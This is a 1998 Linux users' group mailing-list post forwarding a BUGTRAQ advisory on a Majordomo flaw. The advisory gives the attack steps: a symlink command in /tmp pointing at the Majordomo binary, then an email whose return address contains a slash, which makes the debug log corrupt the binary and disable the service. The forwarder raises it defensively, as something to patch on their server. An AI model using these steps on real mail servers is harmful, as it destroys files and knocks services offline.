tlug: Majordomo /tmp exploit (fwd)

[Scott Stone <sstone@example.com>]

I got this message from BUGTRAQ - thought we might want to try coding
around this on the tlug server?

--------------------------------------------------
Scott M. Stone <sstone@example.com, sstone@example.com>
               <sstone@example.com>
Linux Developer/Systems Administrator for Pacific HiTech, Inc. 
http://www.pht.com		http://armadillo.pht.co.jp
http://www.pht.co.jp	        http://www.turbolinux.com


---------- Forwarded message ----------
Date: Thu, 26 Mar 1998 15:03:28 -0600
From: Karl G - NOC Admin <ovrneith@example.com>
To: BUGTRAQ@example.com
Subject: Majordomo /tmp exploit

-=desc=-
Majordomo allows appending to any file owned by the majordomo user/group.

-=x-ploit=-
create a symlink in /tmp to any majordomo file
ex: ln -s /usr/lib/majordomo/majordomo /tmp/majordomo.debug

send a message with any emailer to majordomo with a "/" in the return
address. (i tested with Winbloze Internet Mail)
ex: blah/1234@example.com

the owner of majordomo will receive the below message... from then on,
majordomo will be inoperable.  (if the above symlink is used) Majordomo
keeps a debug log and appends to it every time it crashes with out
checking ownerships of the symlinks.. or for that matter for symlinks at
all.

--snip--
Subject: MAJORDOMO ABORT (mj_majordomo)

--


MAJORDOMO ABORT (mj_majordomo)!!

HOSTILE ADDRESS (no x400 c=) blah/34234@example.com
--snip--

-=fix=-
should the wrapper not check for such things?


party on.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  Karl Grindley
  ICQ: 2660211
  Network Administrator
  TQG Internet Network

---------------------------------------------------------------
Next TLUG Meeting: 11 April Sat, Tokyo Station Yaesu gate 12:30
Featuring Tague Griffith of Netscape i18n talking on source code
---------------------------------------------------------------
a word from the sponsor:
TWICS - Japan's First Public-Access Internet System
www.twics.com  info@example.com  Tel:03-3351-5977  Fax:03-3353-6096